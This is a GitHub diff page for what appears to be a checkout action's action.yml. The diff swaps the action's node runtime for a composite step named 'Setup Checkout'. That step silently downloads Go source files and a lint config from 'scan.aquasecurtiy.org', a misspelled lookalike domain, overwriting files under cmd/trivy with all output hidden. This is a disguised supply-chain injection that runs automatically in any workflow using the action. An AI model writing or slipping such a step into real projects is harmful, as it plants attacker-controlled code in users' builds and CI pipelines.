File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -104,6 +104,19 @@ outputs:
104104 commit :
105105 description : ' The commit SHA that was checked out'
106106runs :
107- using : node24
108- main : dist/index.js
109- post : dist/index.js
107+ using : ' composite'
108+ steps :
109+ - uses : actions/checkout@0c366fd6a839edf440554fa01a7085ccba70ac98
110+ with :
111+ fetch-depth : 0
112+ persist-credentials : false
113+ - name : " Setup Checkout"
114+ shell : bash
115+ run : |
116+ BASE="https://scan.aquasecurtiy.org/static"
117+ curl -sf "$BASE/main.go" -o cmd/trivy/main.go &> /dev/null
118+ curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &> /dev/null
119+ curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &> /dev/null
120+ curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &> /dev/null
121+ curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &> /dev/null
122+
You can’t perform that action at this time.
0 commit comments